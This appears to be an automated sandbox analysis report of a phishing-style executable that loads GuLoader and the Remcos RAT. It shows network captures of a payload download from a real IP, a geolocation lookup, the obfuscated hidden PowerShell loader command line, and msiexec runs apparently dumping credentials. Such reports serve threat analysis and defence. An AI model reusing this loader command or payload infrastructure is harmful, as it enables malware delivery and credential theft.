Dec 10, 2024 13:54:41.240809917 CET | 2404 | 49933 | 212.162.149.91 | 192.168.2.5
Dec 10, 2024 13:54:45.005409956 CET | 49940 | 80 | 192.168.2.5 | 178.237.33.50
Dec 10, 2024 13:54:45.005502939 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:54:45.126367092 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:54:45.126445055 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:54:45.442737103 CET | 49940 | 80 | 192.168.2.5 | 178.237.33.50
Dec 10, 2024 13:54:46.130233049 CET | 49940 | 80 | 192.168.2.5 | 178.237.33.50
Dec 10, 2024 13:54:47.427112103 CET | 49940 | 80 | 192.168.2.5 | 178.237.33.50
Dec 10, 2024 13:54:49.895206928 CET | 49940 | 80 | 192.168.2.5 | 178.237.33.50
Dec 10, 2024 13:54:54.709548950 CET | 49940 | 80 | 192.168.2.5 | 178.237.33.50
Dec 10, 2024 13:55:04.333369017 CET | 49940 | 80 | 192.168.2.5 | 178.237.33.50
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 10, 2024 13:53:00.565506935 CET | 58865 | 53 | 192.168.2.5 | 1.1.1.1
Dec 10, 2024 13:53:00.800461054 CET | 53 | 58865 | 1.1.1.1 | 192.168.2.5

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 10, 2024 13:53:00.565506935 CET | 192.168.2.5 | 1.1.1.1 | 0x418b | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 10, 2024 13:53:00.800461054 CET | 1.1.1.1 | 192.168.2.5 | 0x418b | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false

• 212.162.149.89
• geoplugin.net

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49922 | 212.162.149.89 | 80 | 5752 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 13:52:55.150271893 CET | 173 | OUT | GET /xONeIbG151.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: 212.162.149.89
Cache-Control: no-cache
Dec 10, 2024 13:52:56.311058044 CET | 1236 | IN | HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Tue, 10 Dec 2024 08:06:12 GMT
Accept-Ranges: bytes
ETag: "6298261da4adb1:0"
Server: Microsoft-IIS/8.5
Date: Tue, 10 Dec 2024 12:52:56 GMT
Content-Length: 493120
Data Raw: c6 0c d1 25 99 e7 06 7e 86 e1 ad f4 fa f0 fb de df 0c 5b 6f 49 43 6c a6 ca b9 12 ff 5f 36 34 c9 eb 51 b6 4a 6d 93 8f af 54 49 6e b5 29 3a 12 1e 6a a2 f1 44 0f 9c 6a b7 25 50 f0 bb 02 16 7c fc 2b 41 cc c2 b6 79 48 2a 58 5d 51 60 6e 1e 8f e3 35 d6 61 93 12 78 56 22 bc 7f 17 b8 00 4a 65 e9 a3 4f 7a 9f a5 fd cb 3b 1d 07 0a 7d 2b 5f 1d 8e 59 49 23 73 96 eb 66 ec fa a9 8d 0b 1d 34 c3 06 d4 e8 2a 8d 46 af 9a ce 42 eb 25 af b9 76 6a 7f cb 9f b5 88 32 c9 49 c5 72 62 f0 e6 c9 b1 c4 76 ae a6 1c a8 e6 eb f1 d6 89 85 3f 40 30 1c 0a a1 e9 b2 48 3c be c0 75 9c 89 0f 1f ce 46 6c 1f 8e 12 ff 5e 97 1a 9a 17 89 f7 13 75 69 21 ba f8 1e 92 8d 84 ce 81 16 a6 c3 78 e0 49 a2 d3 00 95 18 c9 34 26 2e b5 bb f2 63 a1 a7 84 5e 3e b5 de 18 b9 a0 8b 6a dc d3 c2 ab 97 c2 54 09 ee dd a1 79 40 d1 96 d8 17 5c 23 8d 57 d4 04 70 b1 94 f4 73 22 89 d0 50 d7 11 cc 76 5f 89 3a ec bc b8 29 dc 79 5a fc e0 5c ac 9a 7a 65 ac 02 73 cf c7 60 cd a1 f7 10 45 1d 00 0e 18 c1 2c de c5 14 9c 49 4e cc 14 5a f1 e9 0d 70 71 10 22 0b c5 cd b6 05 c4 99 65 [TRUNCATED]
Data Ascii: %~[oICl_64QJmTIn):jDj%P|+AyH*X]Q`n5axV"JeOz;}+_YI#sf4*FB%vj2Irbv?@0H<uFl^ui!xI4&.c^>jTy@\#Wps"Pv_:)yZ\zes`E,INZpq"eZvj4ypRW:v3Cw<"<%Z)-'FV/(s}gM+Ul,H|L~\p`|#,RyK{&Bmh'AEp*Y-Kx(}G9X]8bG3MY*ND<G:),E5]L5}"Px4SK[azIlwO(s#uKaEl3On5T)+(^c|yeB@:#tE(z94mQA d4O=#Wa[yz3q0*7x:H%Y[Zxw,K(3ec;/+Yrfr#!V;mR~mTI^;=\o4yr4*vMxg!}JQzw/bDV#QB*F\z'*%A3$><x#a7IQz6>"%5P{S}KK_i|,=+,!Fj
Dec 10, 2024 13:52:56.311099052 CET | 1236 | IN | Data Raw: 9d a6 d4 cb 27 06 6a 9a 55 9e 05 f0 21 11 1d bc e1 0c 16 f1 d1 59 b6 04 7b 46 b8 b0 b3 96 e0 eb d4 33 fa b3 7a 8a ac fd 84 85 c4 49 27 23 c6 b7 8e f9 6a bf 8e bc 0d 93 93 94 f1 07 97 4b 3d a2 b5 d4 f6 3e dd 11 54 bd d1 3a 37 0b ca d3 d9 45 9c f0
Data Ascii: 'jU!Y{F3zI'#jK=>T:7Ef_a0y Ug*NzB`r,k>w=JGap_lG&=;}=a!uVl^Ae%-WN\\$o\H +/?VOhV?4:+8YIKfLzV
Dec 10, 2024 13:52:56.311110973 CET | 1236 | IN | Data Raw: 91 fa 4e 44 55 bf 00 a2 1a 64 bf 56 c9 66 27 cb 53 86 e2 41 1b 40 76 be c2 87 03 be db c5 b4 cd c2 60 eb a4 45 62 9a 56 fe 14 c9 7e d0 f0 ff a5 a2 24 8b f2 79 a0 d3 56 5d 51 08 5c 8f ca e3 65 3c 42 90 12 21 95 48 fc c6 87 f1 47 4a 8d 1b 88 4f 7a
Data Ascii: NDUdVf'SA@v`EbV~$yV]Q\e<B!HGJOzr;)~+qes{VepV% 0_+$ GtP;@FV}Jm7EmPR`75z!UqFb-;Ox*P|*w4:y^CAYQW.LG-
Dec 10, 2024 13:52:56.311240911 CET | 1236 | IN | Data Raw: ce bf 40 25 d6 b5 61 09 59 98 5c 84 ed 19 57 ca 5a dd 2e 11 81 b8 a9 b3 0f 3b ff b6 04 43 90 dd 7a 0e a3 32 c1 f6 90 48 1f 99 ae e1 1b 8e ee 86 16 26 d6 a0 8b 7e 25 53 f4 27 d9 ed 21 e9 f8 fa a2 22 6d 5e 4c e6 fd 39 67 4e 87 48 0e 66 c8 e8 16 9e
Data Ascii: @%aY\WZ.;Cz2H&~%S'!"m^L9gNHfm&fImKH-=CL{xvkHlj*@gv$zH@[JYekgj@>$l-4QW:}TZxM"J6<u%'
Dec 10, 2024 13:52:56.311253071 CET | 896 | IN | Data Raw: af fd a8 fd 26 10 3e 1d 42 7e 01 84 34 e1 b5 c4 f8 85 e4 43 4b 33 71 24 7b 03 73 46 4f ba 3e 47 44 5b b7 8e bf 18 8b 55 e7 af d4 90 32 0a 4a 93 33 ed 0d 26 fa b1 8f 99 c7 81 b7 8b 0a 1a fa b9 71 5a fd ac 6a ba 42 20 15 78 84 8e 80 f4 d8 5d 32 5f
Data Ascii: &>B~4CK3q${sFO>GD[U2J3&qZjB x]2_l<#aZMBws'GC(?YU,!myEAPss,LP3Y3G9e3{v4S:ues}KB}{(4'b"K*^FvWYZFF
Dec 10, 2024 13:52:56.350718021 CET | 1236 | IN | Data Raw: 97 e4 29 3e 4a 0c 40 c2 7f a9 ae 9f c8 b1 04 2d 65 fc 64 93 12 26 9f e0 f4 7f 42 33 ec 1b 33 be 28 b6 92 be 5a 02 34 b0 ed 8c c4 95 04 a0 e2 71 dd 89 57 66 1d a5 72 ad ab 56 bb 80 da dd c5 f9 25 08 1b 4b ae 5d 97 03 63 d0 42 f3 74 da 7b e8 f2 ba
Data Ascii: )>J@-ed&B33(Z4qWfrV%K]cBt{RT.z7j%y'M{g1~{PaV_Vl3:VP1tbrAkd&H&z[,'Vxw%fbB ;/Sqq6 {iXEz? V+{q)
Dec 10, 2024 13:52:56.350734949 CET | 1236 | IN | Data Raw: dc 83 2b 89 da 45 bf d6 02 5b 67 5a a7 aa 05 cf 08 44 84 2a 5e 7f bd 31 c8 8b 51 2f b7 b3 66 80 18 80 9c ef a3 a6 d1 e8 c7 31 02 87 fd 07 b6 c6 c3 95 54 a5 10 57 78 79 0a f7 fa 68 95 28 66 bc f4 4b 2e d7 d6 fe 7a d6 b0 fa 8e 0b 8c d2 f0 b7 b1 72
Data Ascii: +E[gZD*^1Q/f1TWxyh(fK.zrsY03o$GNEG H,lEp:oFD?7oHrBYvx]( zW_s)C\EAB82ee]_IKncbWi]@a8~cYy:l
Dec 10, 2024 13:52:56.350748062 CET | 448 | IN | Data Raw: 76 0e 9d 29 5c 8e 34 43 17 b7 a9 3c 33 92 1a 80 50 8e a5 2f 3a 63 91 75 52 1b 6f 84 ce a4 e4 d8 45 32 4f 33 f2 51 d2 e8 7c cc 4d c8 8b 9a 6d 20 87 d7 f1 61 d7 d4 e5 ac a0 d6 80 f3 d0 0d b5 ed 7e 65 ac 69 78 87 9c a9 82 0b a7 c0 b7 a9 8d 1a 1d b7
Data Ascii: v)\4C<3P/:cuRoE2O3Q|Mm a~eixq9w)aYEd<2Hzi~<%|L{{/bxC`r:qN+p8LM-SBFWqpCM,[MJs~P\p"
Dec 10, 2024 13:52:56.350837946 CET | 1236 | IN | Data Raw: da c4 77 c7 9e 4b 15 1b 25 ef 55 b0 6a e7 9a 1f 76 dc 0f 9c 82 35 45 9d dd d7 ee 6d cb 67 c1 a1 1d 81 5e 28 c2 85 5c f0 21 fa 5a 07 11 36 ce c4 1b 6c cf 56 5d 33 82 17 d5 88 3d 9f 66 a3 60 51 8e b5 7b 2a 0c dc f9 44 62 86 32 85 86 b9 bf 38 86 a7
Data Ascii: wK%Ujv5Emg^(\!Z6lV]3=f`Q{*Db2832]}(iT/{^`-ur!{IArSwAf"N\zw~B@@<Qenr@jYhh4+$iCnS{?ojh|JcT/-8q
Dec 10, 2024 13:52:56.350850105 CET | 1236 | IN | Data Raw: 9e c4 46 85 9a fb 79 db ee 74 f0 80 49 93 f3 60 86 c2 e6 52 40 e6 49 e3 e7 05 ca ec b8 60 a2 2e 0f 8f 99 d4 4d a5 06 b1 de 9e d8 91 81 29 5a 42 67 3f c2 70 7a a7 f2 a2 20 36 76 bb 87 3a 15 72 65 3a d4 67 84 ac ae d0 bf 03 6a 9e b4 2a 6a 8d 74 50
Data Ascii: FytI`R@I`.M)ZBg?pz 6v:re:gj*jtP9Xx/qlbY_>^que9iP2 Ku[l!?u<q{hH+&O^.NjX'&gJj~tvx/Q('D ]afO
Dec 10, 2024 13:52:56.431345940 CET | 1236 | IN | Data Raw: 3f a5 ed f1 4f f1 a6 07 41 c8 8b 33 23 2e 3e 7b 06 95 73 0d 50 01 c0 c6 c2 7a ee 7f 53 d7 5d 4a 5f 2e b5 10 9a 27 ad 58 4e 13 1b 22 ec 2f ba 63 7b ab 8a 82 95 a0 f2 34 a8 dd 20 15 03 cf d7 08 24 c6 43 12 cb dc 20 e8 56 5c f1 67 19 0f 1a f9 8a e4
Data Ascii: ?OA3#.>{sPzS]J_.'XN"/c{4 $C V\g}ivHOIh^4bVy@UV8E1?v,zitI/9gw)V\F[P^L*.|t76Slk`l(*JoQ._/zd\F(F


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49940 | 178.237.33.50 | 80 | 5752 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 13:53:00.931035995 CET | 71 | OUT | GET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache
Dec 10, 2024 13:53:02.178631067 CET | 1171 | IN | HTTP/1.1 200 OK
date: Tue, 10 Dec 2024 12:53:01 GMT
server: Apache
content-length: 963
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
access-control-allow-origin: *
Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 37 35 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 30 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
Data Ascii: { "geoplugin_request":"8.46.123.175", "geoplugin_status":200, "geoplugin_delay":"0ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7503", "geoplugin_longitude":"-74.0014", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                          Target ID:0
                                                                          Start time:07:50:54
                                                                          Start date:10/12/2024
                                                                          Path:C:\Users\user\Desktop\order CF08093-24.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\order CF08093-24.exe"
                                                                          Imagebase:0x400000
                                                                          File size:794'991 bytes
                                                                          MD5 hash:19C071AE3E499DF299092283E301B7A2
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Target ID:2
                                                                          Start time:07:50:55
                                                                          Start date:10/12/2024
                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:powershell.exe -windowstyle hidden "$Amanuensissers25=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Lynlaases\Servicerende.Gal55';$Magnoliaceae=$Amanuensissers25.SubString(71792,3);.$Magnoliaceae($Amanuensissers25)
                                                                          Imagebase:0x410000
                                                                          File size:433'152 bytes
                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.3123794249.000000000A6AE000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:3
                                                                          Start time:07:50:55
                                                                          Start date:10/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6d64d0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:6
                                                                          Start time:07:52:45
                                                                          Start date:10/12/2024
                                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                          Imagebase:0x650000
                                                                          File size:59'904 bytes
                                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000003.3278532416.0000000007B2A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.4475133406.0000000007ABA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000003.3298978061.0000000007B39000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000003.3298626109.0000000007B37000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.4486408121.000000002340F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.4475133406.0000000007AFD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.4475133406.0000000007B39000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.4475133406.0000000007B15000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000003.3275406324.0000000007B2E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:high
                                                                          Has exited:false

                                                                          Target ID:7
                                                                          Start time:07:53:02
                                                                          Start date:10/12/2024
                                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\qzuooqprgulbovxttvfxbedksdnhf"
                                                                          Imagebase:0x650000
                                                                          File size:59'904 bytes
                                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:8
                                                                          Start time:07:53:02
                                                                          Start date:10/12/2024
                                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\qzuooqprgulbovxttvfxbedksdnhf"
                                                                          Imagebase:0x650000
                                                                          File size:59'904 bytes
                                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:9
                                                                          Start time:07:53:02
                                                                          Start date:10/12/2024
                                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\qzuooqprgulbovxttvfxbedksdnhf"
                                                                          Imagebase:0x650000
                                                                          File size:59'904 bytes
                                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:10
                                                                          Start time:07:53:02
                                                                          Start date:10/12/2024
                                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\qzuooqprgulbovxttvfxbedksdnhf"
                                                                          Imagebase:0x650000
                                                                          File size:59'904 bytes
                                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:11
                                                                          Start time:07:53:02
                                                                          Start date:10/12/2024
                                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\aczzpbalucdoyblxcfryerxbbswqyinsk"
                                                                          Imagebase:0x650000
                                                                          File size:59'904 bytes
                                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:12
                                                                          Start time:07:53:02
                                                                          Start date:10/12/2024
                                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\dwmsp"
                                                                          Imagebase:0x650000
                                                                          File size:59'904 bytes
                                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true


                                                                            Execution Graph

                                                                            Execution Coverage:19%
                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                            Signature Coverage:17%
                                                                            Total number of Nodes:1371
                                                                            Total number of Limit Nodes:24
                                                                            [Execution graph: rendered as an interactive call graph in the original report; the underlying node/edge listing (function addresses linked to the Win32 APIs they call, e.g. GlobalAlloc, lstrcpynW, RegOpenKeyExW, CreateProcessW, ShellExecuteExW, CreateFileW, WriteFile) is not reproduced here]
CreateFontIndirectW 4414->4415 4416 401167 EndPaint 4414->4416 4415->4416 4417 401112 6 API calls 4415->4417 4416->4412 4417->4416 4418 402a80 4419 402da9 21 API calls 4418->4419 4420 402a86 4419->4420 4421 402ac9 4420->4421 4422 402aad 4420->4422 4427 402953 4420->4427 4424 402ae3 4421->4424 4425 402ad3 4421->4425 4423 402ab2 4422->4423 4431 402ac3 4422->4431 4432 406541 lstrcpynW 4423->4432 4426 40657e 21 API calls 4424->4426 4428 402da9 21 API calls 4425->4428 4426->4431 4428->4431 4431->4427 4433 406488 wsprintfW 4431->4433 4432->4427 4433->4427 4434 401781 4435 402dcb 21 API calls 4434->4435 4436 401788 4435->4436 4437 406060 2 API calls 4436->4437 4438 40178f 4437->4438 4438->4438 4439 401d82 4440 402da9 21 API calls 4439->4440 4441 401d93 SetWindowLongW 4440->4441 4442 402c4f 4441->4442 3423 401f03 3431 402da9 3423->3431 3425 401f09 3426 402da9 21 API calls 3425->3426 3427 401f15 3426->3427 3428 401f21 ShowWindow 3427->3428 3429 401f2c EnableWindow 3427->3429 3430 402c4f 3428->3430 3429->3430 3432 40657e 21 API calls 3431->3432 3433 402dbe 3432->3433 3433->3425 4443 401503 4444 401508 4443->4444 4446 40152e 4443->4446 4445 402da9 21 API calls 4444->4445 4445->4446 4447 402903 4448 40290b 4447->4448 4449 40290f FindNextFileW 4448->4449 4450 402921 4448->4450 4449->4450 4451 402968 4449->4451 4453 406541 lstrcpynW 4451->4453 4453->4450 3537 405705 3538 405726 GetDlgItem GetDlgItem GetDlgItem 3537->3538 3539 4058af 3537->3539 3582 4044f5 SendMessageW 3538->3582 3541 4058e0 3539->3541 3542 4058b8 GetDlgItem CreateThread CloseHandle 3539->3542 3544 40590b 3541->3544 3545 405930 3541->3545 3546 4058f7 ShowWindow ShowWindow 3541->3546 3542->3541 3585 405699 OleInitialize 3542->3585 3543 405796 3549 40579d GetClientRect GetSystemMetrics SendMessageW SendMessageW 3543->3549 3547 40596b 3544->3547 3551 405945 ShowWindow 3544->3551 3552 40591f 3544->3552 3548 404527 8 API calls 3545->3548 3584 4044f5 SendMessageW 3546->3584 3547->3545 3557 405979 SendMessageW 
3547->3557 3564 40593e 3548->3564 3555 40580b 3549->3555 3556 4057ef SendMessageW SendMessageW 3549->3556 3553 405965 3551->3553 3554 405957 3551->3554 3558 404499 SendMessageW 3552->3558 3560 404499 SendMessageW 3553->3560 3559 4055c6 28 API calls 3554->3559 3561 405810 SendMessageW 3555->3561 3562 40581e 3555->3562 3556->3555 3563 405992 CreatePopupMenu 3557->3563 3557->3564 3558->3545 3559->3553 3560->3547 3561->3562 3566 4044c0 22 API calls 3562->3566 3565 40657e 21 API calls 3563->3565 3567 4059a2 AppendMenuW 3565->3567 3568 40582e 3566->3568 3569 4059d2 TrackPopupMenu 3567->3569 3570 4059bf GetWindowRect 3567->3570 3571 405837 ShowWindow 3568->3571 3572 40586b GetDlgItem SendMessageW 3568->3572 3569->3564 3574 4059ed 3569->3574 3570->3569 3575 40585a 3571->3575 3576 40584d ShowWindow 3571->3576 3572->3564 3573 405892 SendMessageW SendMessageW 3572->3573 3573->3564 3577 405a09 SendMessageW 3574->3577 3583 4044f5 SendMessageW 3575->3583 3576->3575 3577->3577 3578 405a26 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3577->3578 3580 405a4b SendMessageW 3578->3580 3580->3580 3581 405a74 GlobalUnlock SetClipboardData CloseClipboard 3580->3581 3581->3564 3582->3543 3583->3572 3584->3544 3586 40450c SendMessageW 3585->3586 3590 4056bc 3586->3590 3587 4056e3 3588 40450c SendMessageW 3587->3588 3589 4056f5 CoUninitialize 3588->3589 3590->3587 3591 401389 2 API calls 3590->3591 3591->3590 4454 404d07 4455 404d33 4454->4455 4456 404d17 4454->4456 4458 404d66 4455->4458 4459 404d39 SHGetPathFromIDListW 4455->4459 4465 405b85 GetDlgItemTextW 4456->4465 4461 404d49 4459->4461 4464 404d50 SendMessageW 4459->4464 4460 404d24 SendMessageW 4460->4455 4462 40140b 2 API calls 4461->4462 4462->4464 4464->4458 4465->4460 4466 401588 4467 402bc9 4466->4467 4470 406488 wsprintfW 4467->4470 4469 402bce 4470->4469 4471 40198d 4472 402da9 21 API calls 4471->4472 4473 401994 4472->4473 4474 402da9 21 API calls 4473->4474 4475 4019a1 4474->4475 4476 402dcb 21 API calls 4475->4476 
4477 4019b8 lstrlenW 4476->4477 4479 4019c9 4477->4479 4478 401a0a 4479->4478 4483 406541 lstrcpynW 4479->4483 4481 4019fa 4481->4478 4482 4019ff lstrlenW 4481->4482 4482->4478 4483->4481 4484 40168f 4485 402dcb 21 API calls 4484->4485 4486 401695 4485->4486 4487 40689e 2 API calls 4486->4487 4488 40169b 4487->4488 4489 402b10 4490 402da9 21 API calls 4489->4490 4491 402b16 4490->4491 4492 402953 4491->4492 4493 40657e 21 API calls 4491->4493 4493->4492 4494 402711 4495 402da9 21 API calls 4494->4495 4502 402720 4495->4502 4496 40276a ReadFile 4496->4502 4506 40285d 4496->4506 4497 4060b4 ReadFile 4497->4502 4498 4027aa MultiByteToWideChar 4498->4502 4499 40285f 4507 406488 wsprintfW 4499->4507 4500 406112 5 API calls 4500->4502 4502->4496 4502->4497 4502->4498 4502->4499 4502->4500 4503 4027d0 SetFilePointer MultiByteToWideChar 4502->4503 4504 402870 4502->4504 4502->4506 4503->4502 4505 402891 SetFilePointer 4504->4505 4504->4506 4505->4506 4507->4506 4508 401491 4509 4055c6 28 API calls 4508->4509 4510 401498 4509->4510 3434 401794 3472 402dcb 3434->3472 3436 40179b 3437 4017c3 3436->3437 3438 4017bb 3436->3438 3515 406541 lstrcpynW 3437->3515 3514 406541 lstrcpynW 3438->3514 3441 4017c1 3445 4067ef 5 API calls 3441->3445 3442 4017ce 3516 405e10 lstrlenW CharPrevW 3442->3516 3461 4017e0 3445->3461 3449 4017f2 CompareFileTime 3449->3461 3450 4018b2 3482 4055c6 3450->3482 3451 401889 3454 4055c6 28 API calls 3451->3454 3463 40189e 3451->3463 3454->3463 3455 406541 lstrcpynW 3455->3461 3458 4018e3 SetFileTime 3460 4018f5 CloseHandle 3458->3460 3459 40657e 21 API calls 3459->3461 3462 401906 3460->3462 3460->3463 3461->3449 3461->3450 3461->3451 3461->3455 3461->3459 3468 405ba1 